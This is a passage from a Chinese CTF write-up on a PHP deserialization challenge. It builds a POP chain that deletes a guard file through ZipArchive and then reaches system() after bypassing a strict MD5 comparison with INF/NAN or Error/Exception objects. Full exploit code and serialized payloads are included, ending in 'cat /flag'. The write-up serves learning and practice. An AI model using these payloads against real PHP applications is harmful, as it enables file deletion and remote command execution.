然后找如何才能触发__get()魔术方法，找找哪里调用了不存在的属性，就是在Start类的__toString()魔术方法中调用了haohao这个不存在的属性

public function __toString(){
    $this->arg->haohao;
    return "<br>"."Start Test"."<br>";
}

然后可以在该类的__destruct()方法中可以触发__toString()魔术方法，这就是这条POP链的开头了

public function __destruct(){
    echo "<br>"."arg:".$this->arg."<br>";
}

构造EXP

然后开始构造EXP，从后往前构造吧：

先是最后的利用点UseFul类

$UseFul = new UseFul();
$UseFul->class = "ZipArchive";
$UseFul->file = "risk.txt";
$UseFul->flags = 8;

然后是要能触发UseFul类的__get()魔术方法，就到了Start类的__toString魔术方法

$Start1 = new Start();
$Start1->arg = $UseFul;

然后是该类的__destruct()方法触发__toString魔术方法

$Start2 = new Start();
$Start2->arg = $Start1;

# 如果不删去__construct()方法可以和上一步简写为：
$Start = new Start(new Start($Useful));

最后一个序列化，可以加个反序列化来本地下断点调试一下

$payload = serialize($Start2);
echo $payload;
//unserialize($payload);

完整EXP：

<?php

error_reporting(0);

class Start{
    public $arg;

    public function __destruct(){
        echo "<br>"."arg:".$this->arg."<br>";
    }

    public function __toString(){
        $this->arg->haohao;
        return "<br>"."Start Test"."<br>";
    }
}

class UseFul{
    public $class;
    public $file;
    public $flags;

    public function __get($arg){
        $this->write($this->class,$this->file,$this->flags);
    }

    public function write($class,$file,$flags){
        $obj = new $class();
        $obj->open($file,$flags);
        echo "<br>"."Successful"."<br>";
        return true;
    }
}

$UseFul = new UseFul();
$UseFul->class = "ZipArchive";
$UseFul->file = "risk.txt";
$UseFul->flags = 8;

$Start1 = new Start();
$Start1->arg = $UseFul;

$Start2 = new Start();
$Start2->arg = $Start1;

$payload = serialize($Start2);
echo $payload;
//unserialize($payload);

O:5:"Start":1:{s:3:"arg";O:5:"Start":1:{s:3:"arg";O:6:"UseFul":3:{s:5:"class";s:10:"ZipArchive";s:4:"file";s:8:"risk.txt";s:5:"flags";i:8;}}}

在unserialize($payload);下个断点，本地同目录创建个risk.txt文件，可以发现是能成功执行到想要执行的删除文件的这部分代码的，并且最终risk.txt是能成功删除的

提交payload后再访问risk.txt会发现没有这个文件了，就可以去进行RCE了

RCE

现在已经成功删去了risk.txt文件，再回头看GetFlag类的代码

class GetFlag{
    public $a;
    public $b;
    public $func;
    public $var;

    public function __get($arg){
        $a = $this->a;
        $b = $this->b;
        if($a!==$b && (!is_array($a)) && (!is_array($b)) && md5($a)===md5($b)){
            if(file_exists("risk.txt")){
                exit("High Risk");
            }else{
                echo "<br>"."Completely Safe"."<br>";
                $func = $this->func;
                $var = $this->var;
                $func($var);
            }
        }
    }
}

此时if判断就可以通过了，然后继续往上看，还有一个if判断，是考的MD5强比较的，并且禁用了数组绕过

这里给出两种方法绕过

MD5强比较绕过

方法一：原生类绕过MD5比较

笔记：https://yschen20.github.io/2025/12/18/PHP%E5%8E%9F%E7%94%9F%E7%B1%BB%E5%88%A9%E7%94%A8/#%E5%8F%AF%E7%BB%95%E8%BF%87%E5%93%88%E5%B8%8C%E6%AF%94%E8%BE%83%E7%9A%84%E7%B1%BB

Exception也是同理，Error 只能在 PHP7 使用，Exception 可以在 PHP5 以上的，这题我给的版本是7.4.33，所以俩都可以用

所以可以构造成下面这种形式来绕过（一定要写在同一行）：

$Getflag->a = new Error("payload",1);$Getflag->b = new Error("payload",2);
# 或
$Getflag->a = new Exception("payload",1);$Getflag->b = new Exception("payload",2);

方法二：NAN或INF绕过MD5比较

所以可以构造payload为：

$Getflag->a = NAN;
$Getflag->b = "NAN";
# 或
$Getflag->a = INF;
$Getflag->b = "INF";

以上这些代码也都是在GetFlag的__get()方法里，所以前面部分和刚才删文件的思路一致

构造EXP

首先设置好RCE的代码：

$Getflag = new GetFlag();
$Getflag->func = "system";
$Getflag->var = "whoami";

然后是绕过MD5强比较：

$Getflag->a = new Error("payload",1);$Getflag->b = new Error("payload",2);
# 或
$Getflag->a = new Exception("payload",1);$Getflag->b = new Exception("payload",2);
# 或
$Getflag->a = NAN;
$Getflag->b = "NAN";
# 或
$Getflag->a = INF;
$Getflag->b = "INF";

然后就是和前面的一样了

$Start1 = new Start();
$Start1->arg = $UseFul;
$Start2 = new Start();
$Start2->arg = $Start1;

# 如果不删去__construct()方法可以简写为：
$Start = new Start(new Start($Getflag));

最后序列化，再反序列化本地测试一下

$payload = serialize($Start2);
echo $payload;
//unserialize($payload);

完整EXP：

<?php

error_reporting(0);

class Start{
    public $arg;

    public function __destruct(){
        echo "<br>"."arg:".$this->arg."<br>";
    }

    public function __toString(){
        $this->arg->haohao;
        return "<br>"."Start Test"."<br>";
    }
}

class GetFlag{
    public $a;
    public $b;
    public $func;
    public $var;

    public function __get($arg){
        $a = $this->a;
        $b = $this->b;
        if($a!==$b && (!is_array($a)) && (!is_array($b)) && md5($a)===md5($b)){
            if(file_exists("risk.txt")){
                exit("High Risk");
            }else{
                echo "<br>"."Completely Safe"."<br>";
                $func = $this->func;
                $var = $this->var;
                $func($var);
            }
        }
    }
}

$Getflag = new GetFlag();
$Getflag->func = "system";
$Getflag->var = "whoami";
$Getflag->a = INF;$Getflag->b = "INF";
//或
//$Getflag->a = NAN;$Getflag->b = "NAN";
//或
//$Getflag->a = new Error("payload",1);$Getflag->b = new Error("payload",2);
//或
//$Getflag->a = new Exception("payload",1);$Getflag->b = new Exception("payload",2);

$Start1 = new Start();
$Start1->arg = $Getflag;

$Start2 = new Start();
$Start2->arg = $Start1;

$payload = serialize($Start2);
echo $payload;
unserialize($payload);

O:5:"Start":1:{s:3:"arg";O:5:"Start":1:{s:3:"arg";O:7:"GetFlag":4:{s:1:"a";s:3:"INF";s:1:"b";d:INF;s:4:"func";s:6:"system";s:3:"var";s:6:"whoami";}}}

命令改成cat /flag读flag

完整EXP

<?php

error_reporting(0);

class Start{
    public $arg;

    public function __construct($arg){
        $this->arg = $arg;
    }

    public function __destruct(){
        echo "<br>"."arg:".$this->arg."<br>";
    }

    public function __toString(){
        $this->arg->haohao;
        return "<br>"."Start Test"."<br>";
    }
}

class GetFlag{
    public $a;
    public $b;
    public $func;
    public $var;

    public function __get($arg){
        $a = $this->a;
        $b = $this->b;
        if($a!==$b && (!is_array($a)) && (!is_array($b)) && md5($a)===md5($b)){
            if(file_exists("risk.txt")){
                exit("High Risk");
            }else{
                echo "<br>"."Completely Safe"."<br>";
                $func = $this->func;
                $var = $this->var;
                $func($var);
            }
        }
    }
}

class UseFul{
    public $class;
    public $file;
    public $flags;

    public function __get($arg){
        $this->write($this->class,$this->file,$this->flags);
    }

    public function write($class,$file,$flags){
        $obj = new $class();
        $obj->open($file,$flags);
        echo "<br>"."Successful"."<br>";
        return true;
    }
}

$Useful = new Useful();
$Useful->class = "ZipArchive";
$Useful->file = "risk.txt";
$Useful->flags = 8;

$Getflag = new GetFlag();
$Getflag->func = "system";
$Getflag->var = "cat /flag";
$Getflag->a = INF;$Getflag->b = "INF";
//或
//$Getflag->a = NAN;$Getflag->b = "NAN";
//或
//$Getflag->a = new Error("payload",1);$Getflag->b = new Error("payload",2);
//或
//$Getflag->a = new Exception("payload",1);$Getflag->b = new Exception("payload",2);

//$Start = new Start(new Start($Useful));
$Start = new Start(new Start($Getflag));

$payload = serialize($Start);
echo $payload;
//unserialize($payload);